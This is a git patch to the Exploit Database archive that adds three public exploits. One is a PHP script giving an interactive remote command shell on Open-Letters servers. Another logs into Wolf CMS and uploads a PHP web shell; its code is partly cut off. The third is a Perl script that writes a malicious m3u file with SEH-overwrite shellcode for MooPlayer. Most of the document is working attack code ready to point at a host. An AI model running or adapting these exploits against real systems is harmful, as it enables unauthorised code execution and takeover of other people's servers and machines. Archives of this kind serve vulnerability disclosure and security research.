From 6ddbb48d4d82bb1311637a8fc954f2687a41f59e Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Thu, 23 Apr 2015 05:03:27 +0000
Subject: [PATCH] DB: 2015-04-23 3 new exploits
---
 files.csv | 3 +
 platforms/php/webapps/36816.php | 78 ++++++++++++++
 platforms/php/webapps/36818.php | 173 +++++++++++++++++++++++++++++++
 platforms/windows/local/36819.pl | 119 +++++++++++++++++++++
 4 files changed, 373 insertions(+)
 create mode 100755 platforms/php/webapps/36816.php
 create mode 100755 platforms/php/webapps/36818.php
 create mode 100755 platforms/windows/local/36819.pl
diff --git a/files.csv b/files.csv
index 2cf14c6b1..e216bb909 100755
--- a/files.csv
+++ b/files.csv
@@ -26594,6 +26594,7 @@ id,file,description,date,author,platform,type,port
 29687,platforms/windows/remote/29687.py,"HyperBook Guestbook 1.3 GBConfiguration.DAT Hashed Password Information Disclosure Vulnerability",2007-02-28,PeTrO,windows,remote,0
 29544,platforms/php/webapps/29544.txt,"Juniper Junos J-Web - Privilege Escalation Vulnerability",2013-11-12,"Sense of Security",php,webapps,0
 29545,platforms/windows/dos/29545.rb,"Hanso Converter 2.4.0 - 'ogg' Buffer Overflow (DoS)",2013-11-12,"Necmettin COSKUN",windows,dos,0
+36816,platforms/php/webapps/36816.php,"Open-Letters Remote PHP Code Injection Vulnerability",2015-04-22,"TUNISIAN CYBER",php,webapps,80
 29546,platforms/windows/dos/29546.rb,"Provj 5.1.5.8 - 'm3u' Buffer Overflow (PoC)",2013-11-12,"Necmettin COSKUN",windows,dos,0
 29548,platforms/windows/local/29548.rb,"VideoSpirit Lite 1.77 - (SEH) Buffer Overflow",2013-11-12,metacom,windows,local,0
 29549,platforms/windows/local/29549.pl,"ALLPlayer 5.6.2 - (.m3u) Local Buffer Overflow (SEH/Unicode)",2013-11-12,"Mike Czumak",windows,local,0
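Review bot: The new `36816` row is inserted between the `29545` and `29546` records, out of id sequence, whereas the other two new rows in the next hunk (`36818`, `36819`) are appended at the tail of the file; if files.csv is meant to be ordered by id, this row belongs at the end next to them. The row's date `2015-04-22` also disagrees with the `Date: 19-04-2015` header inside the added 36816.php, and the 36819 row's `2015-04-22` disagrees with that script's `Date: 09-02-2015` header; this is consistent with the `date` column recording the database-entry date rather than the author's publication date, but the header row gives no hint, so a reader comparing the two sources cannot tell which is authoritative. If that is the intended meaning, documenting it alongside the column definition (the CSV itself has no comment syntax, so in the accompanying README or schema notes) would settle it.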
@@ -33217,3 +33218,5 @@ id,file,description,date,author,platform,type,port
 36813,platforms/hardware/local/36813.txt,"ADB Backup Archive Path Traversal File Overwrite",2015-04-21,"Imre Rad",hardware,local,0
 36814,platforms/osx/dos/36814.c,"Mac OS X Local Denial of Service",2015-04-21,"Maxime Villard",osx,dos,0
 36815,platforms/cfm/webapps/36815.txt,"BlueDragon CFChart Servlet 7.1.1.17759 - Arbitrary File Retrieval/Deletion",2015-04-21,Portcullis,cfm,webapps,80
+36818,platforms/php/webapps/36818.php,"Wolf CMS 0.8.2 Arbitrary File Upload Exploit",2015-04-22,"CWH Underground",php,webapps,80
+36819,platforms/windows/local/36819.pl,"MooPlayer 1.3.0 'm3u' SEH Buffer Overflow",2015-04-22,"Tomislav Paskalev",windows,local,0
diff --git a/platforms/php/webapps/36816.php b/platforms/php/webapps/36816.php
new file mode 100755
index 000000000..d0d16f032
--- /dev/null
+++ b/platforms/php/webapps/36816.php
@@ -0,0 +1,78 @@ + + +*/ + +error_reporting(0); +set_time_limit(0); +ini_set("default_socket_timeout", 5); + +function http_send($host, $packet) +{ + if (!($sock = fsockopen($host, 80))) + die( "\n[-] No response from {$host}:80\n"); + + fwrite($sock, $packet); + return stream_get_contents($sock); +} + +print "#[+] Author: TUNISIAN CYBER\n"; +print "#[+] Script coded BY: Egidio Romano aka EgiX\n"; +print "#[+] Title: Open-Letters Remote PHP Code Injection Vulnerability\n"; +print "#[+] Date: 19-04-2015\n"; +print "#[+] Vendor: http://www.open-letters.de/\n"; +print "#[+] Type: WebAPP\n"; +print "#[+] Tested on: KaliLinux (Debian)\n"; +print "#[+] CVE:\n"; +print "#[+] Twitter: @TCYB3R\n"; +print "#[+] Egix's Contact: n0b0d13s[at]gmail[dot]com\n"; +print "#[+] Proof of concept: http://i.imgur.com/TNKV8Mt.png"; + +if ($argc < 3) +{ + print "\nUsage......: php $argv[0] "; + print "\nExample....: php $argv[0] localhost /"; + print "\nExample....: php $argv[0] localhost /zenphoto/\n"; + die(); +} + +$host = $argv[1]; +$path = $argv[2]; + +$exploit = "foo="; +$packet = "POST {$path}external_scripts/tinymce/plugins/ajaxfilemanager/ajax_create_folder.php HTTP/1.0\r\n"; +$packet .= "Host: {$host}\r\n"; +$packet .= "Content-Length: ".strlen($exploit)."\r\n"; +$packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; +$packet .= "Connection: close\r\n\r\n{$exploit}"; + +http_send($host, $packet); + +$packet = "GET {$path}external_scripts/tinymce/plugins/ajaxfilemanager/inc/data.php HTTP/1.0\r\n"; +$packet .= "Host: {$host}\r\n"; +$packet .= "Cmd: %s\r\n"; +$packet .= "Connection: close\r\n\r\n"; + +while(1) +{ + print "\nOL-shell> "; + if (($cmd = trim(fgets(STDIN))) == "exit") break; + preg_match("/_code_(.*)/s", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ? + print $m[1] : die("\n[-] Exploit failed!\n"); +} + +?> \ No newline at end of file 
diff --git a/platforms/php/webapps/36818.php b/platforms/php/webapps/36818.php new file mode 100755 index 000000000..8cac14077 --- /dev/null +++ b/platforms/php/webapps/36818.php 
@@ -0,0 +1,173 @@ +_upload_file($filename, FILES_DIR . '/' . $path . '/', $_FILES['upload_file']['tmp_name'], $overwrite); + + if ($file === false) + Flash::set('error', __('File has not been uploaded!')); + } +----------------------------------------------------------------------------- + +##################### +Disclosure Timeline +##################### + +[04/04/2015] - Issue reported to Developer Team +[08/04/2015] - Discussed for fixing the issue +[16/04/2015] - Issue reported to http://seclists.org/oss-sec/2015/q2/210 +[22/04/2015] - Public disclosure + +##################################################### +EXPLOIT +##################################################### + +*/ + +error_reporting(0); +set_time_limit(0); +ini_set("default_socket_timeout", 50); + +function http_send($host, $packet) +{ + if (!($sock = fsockopen($host, 80))) + die("\n[-] No response from {$host}:80\n"); + + fputs($sock, $packet); + return stream_get_contents($sock); +} + +print "\n+---------------------------------------+"; +print "\n| WolfCMS Arbitrary File Upload Exploit |"; +print "\n+---------------------------------------+\n"; + +if ($argc < 5) +{ + print "\nUsage......: php $argv[0] \n"; + print "\nExample....: php $argv[0] localhost /wolfcms test password\n"; + die(); +} + +$host = $argv[1]; +$path = $argv[2]; +$user = $argv[3]; +$pass = $argv[4]; + + print "\n ,--^----------,--------,-----,-------^--, \n"; + print " | ||||||||| `--------' | O \n"; + print " `+---------------------------^----------| \n"; + print " `\_,-------, _________________________| \n"; + print " / XXXXXX /`| / \n"; + print " / XXXXXX / `\ / \n"; + print " / XXXXXX /\______( \n"; + print " / XXXXXX / \n"; + print " / XXXXXX / .. CWH Underground Hacking Team .. 
\n"; + print " (________( \n"; + print " `------' \n"; + +$login = "login[username]={$user}&login[password]={$pass}&login[redirect]=/wolfcms/?/admin/"; +$packet = "POST {$path}/?/admin/login/login HTTP/1.1\r\n"; +$packet .= "Host: {$host}\r\n"; +$packet .= "Cookie: PHPSESSID=cwh\r\n"; +$packet .= "Content-Length: ".strlen($login)."\r\n"; +$packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; +$packet .= "Connection: close\r\n\r\n{$login}"; + +$response = http_send($host, $packet); + + if (!preg_match_all("/Set-Cookie: ([^;]*);/i", $response, $sid)) die("\n[-] Session ID not found!\n"); + +$packet = "GET {$path}/?/admin/plugin/file_manager HTTP/1.1\r\n"; +$packet .= "Host: {$host}\r\n"; +$packet .= "Cookie: {$sid[1][2]}\r\n"; +$packet .= "Connection: close\r\n\r\n"; +$response=http_send($host, $packet); + +if (!preg_match_all("/csrf_token\" type=\"hidden\" value=\"(.*?)\" \/>/i", $response, $token)) die("\n[-] The username/password is incorrect!\n"); +print "\n[+] Login Successfully !!\n"; +sleep(2); +print "\n[+] Retrieving The Upload token !!\n"; +print "[+] The token is: {$token[1][4]}\n"; + +$payload = "--o0oOo0o\r\n"; +$payload .= "Content-Disposition: form-data; name=\"csrf_token\"\r\n\r\n"; +$payload .= "{$token[1][4]}\r\n"; +$payload .= "--o0oOo0o\r\n"; +$payload .= "Content-Disposition: form-data; name=\"upload_file\"; filename=\"shell.php\"\r\n"; +$payload .= "Content-Type: application/octet-stream\r\n\r\n"; +$payload .= " \ No newline at end of file diff --git a/platforms/windows/local/36819.pl b/platforms/windows/local/36819.pl new file mode 100755 index 000000000..333e99456 --- /dev/null +++ b/platforms/windows/local/36819.pl 
@@ -0,0 +1,119 @@ +#!/usr/bin/perl + +###########################################################################= +################################# +# Exploit Title: MooPlayer 1.3.0 'm3u' SEH Buffer Overflow +# Date: 09-02-2015 +# Exploit Author: Tomislav Paskalev +# Vulnerable Software: MooPlayer v1.3.0 +# Vendor Homepage: https://mooplayer.jaleco.com/ +# Software Link: http://www.exploit-db.com/apps/a2eba48a6789803f2a3aca8c93b=86cb7-mooplayer-1.3.0.zip +# Version: 1.3.0 +# Tested on: Windows XP SP2 EN +# OSVDB-ID: 118128 +###########################################################################= +################################# +# Credits: +# Vulnerability identified by Samandeep Singh +# http://www.exploit-db.com/exploits/36022/ +###########################################################################= +################################# +# Exploit notes: +# mooplayer.exe was not compiled with SafeSEH, but always contains \x00 (bad character) +# available and could be used, which would make the exploit work across multiple OS +# versions, but the shellcode space would be limited since \x00 would terminate the string +# other available modules (Win XP SP2 EN) - enough space for larger shellcode +# oledlg.dll (Rebase: False | SafeSEH: False | ASLR: False | NXCompat: False | OS Dll: True) +# OLEACC.dll (Rebase: False | SafeSEH: False | ASLR: False | NXCompat: False | OS Dll: True) +###########################################################################= +################################# +# Bad characters: +# "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09" +# "\x0b\x0c" +# "\x0e\x0f" +# "\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19" +# "\x1a\x1b\x1c\x1d\x1e\x1f" +###########################################################################= +################################# +# How to exploit: +# MooPlayer -> File -> Open Media File -> Files of type: Playlists -> (navigate to created exploit +# file) -> Open +# OR drag and drop created exploit file into MooPlayer 
+###########################################################################= +################################# +# Thanks to: +# Samandeep Singh (PoC) +# Peter Van Eeckhoutte (exploit development tutorials) +# Offensive Security (IT security courses, admin support) +###########################################################################= +################################# + + +$file = "MooPlayer_messagebox.m3u"; + +my $junk = "A" x 264; +my $nextSEH = "\xeb\x20\x90\x90"; # jump over the next 32 bytes +my $SEH = pack('V',0x74c96950); # POP POP RET from oleacc.dll (Win XP SP2 EN) +my $NOPs = "\x90" x 100; + +# msfpayload windows/messagebox +# msfencode -e x86/alpha_upper +my $shellcode = +"\x89\xe5\xd9\xf7\xd9\x75\xf4\x5f\x57\x59\x49\x49\x49\x49" . +"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" . +"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" . +"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" . +"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4e\x39\x5a" . +"\x4b\x4d\x4b\x38\x59\x54\x34\x46\x44\x5a\x54\x46\x51\x39" . +"\x42\x58\x32\x53\x47\x36\x51\x4f\x39\x32\x44\x4c\x4b\x44" . +"\x31\x46\x50\x4c\x4b\x33\x46\x44\x4c\x4c\x4b\x44\x36\x35" . +"\x4c\x4c\x4b\x57\x36\x55\x58\x4c\x4b\x53\x4e\x31\x30\x4c" . +"\x4b\x50\x36\x46\x58\x50\x4f\x52\x38\x54\x35\x4c\x33\x36" . +"\x39\x53\x31\x58\x51\x4b\x4f\x4d\x31\x45\x30\x4c\x4b\x42" . +"\x4c\x57\x54\x47\x54\x4c\x4b\x57\x35\x57\x4c\x4c\x4b\x31" . +"\x44\x51\x38\x33\x48\x35\x51\x4b\x5a\x4c\x4b\x50\x4a\x55" . +"\x48\x4c\x4b\x31\x4a\x31\x30\x55\x51\x5a\x4b\x4b\x53\x56" . +"\x54\x30\x49\x4c\x4b\x50\x34\x4c\x4b\x33\x31\x5a\x4e\x50" . +"\x31\x4b\x4f\x56\x51\x59\x50\x4b\x4c\x4e\x4c\x4b\x34\x59" . +"\x50\x53\x44\x55\x57\x49\x51\x38\x4f\x34\x4d\x33\x31\x59" . +"\x57\x4a\x4b\x4c\x34\x47\x4b\x43\x4c\x57\x54\x51\x38\x34" . +"\x35\x4d\x31\x4c\x4b\x31\x4a\x47\x54\x45\x51\x4a\x4b\x55" . +"\x36\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x51\x4a\x35\x4c\x33" . 
+"\x31\x4a\x4b\x4c\x4b\x43\x34\x4c\x4b\x33\x31\x4b\x58\x4c" . +"\x49\x30\x44\x51\x34\x35\x4c\x55\x31\x38\x43\x4e\x52\x44" . +"\x48\x57\x59\x59\x44\x4d\x59\x4a\x45\x4b\x39\x39\x52\x35" . +"\x38\x4c\x4e\x30\x4e\x44\x4e\x4a\x4c\x50\x52\x4d\x38\x4d" . +"\x4f\x4b\x4f\x4b\x4f\x4b\x4f\x4b\x39\x30\x45\x34\x44\x4f" . +"\x4b\x33\x4e\x49\x48\x4d\x32\x33\x43\x4d\x57\x55\x4c\x51" . +"\x34\x51\x42\x4b\x58\x4c\x4e\x4b\x4f\x4b\x4f\x4b\x4f\x4d" . +"\x59\x37\x35\x53\x38\x33\x58\x32\x4c\x42\x4c\x37\x50\x37" . +"\x31\x43\x58\x50\x33\x37\x42\x36\x4e\x53\x54\x53\x58\x54" . +"\x35\x32\x53\x33\x55\x53\x42\x4b\x38\x31\x4c\x47\x54\x44" . +"\x4a\x4c\x49\x5a\x46\x50\x56\x4b\x4f\x31\x45\x53\x34\x4c" . +"\x49\x39\x52\x56\x30\x4f\x4b\x4e\x48\x4f\x52\x30\x4d\x4f" . +"\x4c\x4d\x57\x55\x4c\x31\x34\x56\x32\x4d\x38\x45\x31\x4b" . +"\x4f\x4b\x4f\x4b\x4f\x53\x58\x46\x38\x31\x30\x51\x30\x51" . +"\x30\x33\x58\x36\x34\x45\x35\x54\x33\x33\x44\x56\x51\x39" . +"\x4b\x4d\x58\x51\x4c\x47\x54\x34\x44\x4b\x39\x5a\x43\x43" . +"\x58\x52\x4e\x56\x4e\x31\x48\x31\x30\x55\x38\x53\x51\x34" . +"\x34\x42\x49\x52\x4f\x32\x48\x54\x30\x42\x4c\x42\x49\x43" . +"\x53\x33\x58\x35\x34\x37\x50\x35\x31\x34\x30\x45\x38\x32" . +"\x4f\x35\x39\x54\x34\x45\x35\x45\x38\x33\x55\x33\x48\x52" . +"\x50\x52\x4c\x45\x38\x44\x34\x32\x48\x35\x35\x57\x50\x53" . +"\x58\x57\x50\x52\x4f\x55\x36\x31\x30\x55\x38\x33\x44\x32" . +"\x45\x34\x38\x34\x34\x32\x48\x31\x30\x55\x33\x52\x4f\x42" . +"\x4e\x32\x48\x51\x30\x43\x44\x32\x48\x43\x55\x43\x58\x32" . +"\x4e\x31\x30\x42\x49\x42\x4e\x52\x48\x42\x55\x33\x44\x32" . +"\x49\x52\x4f\x55\x38\x43\x55\x33\x48\x42\x45\x42\x43\x35" . +"\x38\x52\x4f\x45\x34\x52\x45\x51\x30\x32\x48\x55\x35\x33" . +"\x54\x37\x50\x53\x53\x35\x38\x30\x47\x45\x31\x45\x39\x32" . +"\x4e\x30\x31\x39\x59\x4d\x58\x30\x4c\x57\x54\x50\x42\x4c" . +"\x49\x4b\x51\x30\x31\x58\x52\x42\x4a\x57\x30\x31\x43\x50" . +"\x51\x31\x42\x4b\x4f\x58\x50\x46\x51\x4f\x30\x50\x50\x4b" . 
+"\x4f\x50\x55\x45\x58\x41\x41"; + +# keep the exploit length consistent +my $endjunk = "\x90" x (10000 - length($junk.$nextSEH.$SEH.$NOPs.$shellcode)); + +open(myfile,">$file") ; +print myfile $junk.$nextSEH.$SEH.$NOPs.$shellcode.$endjunk;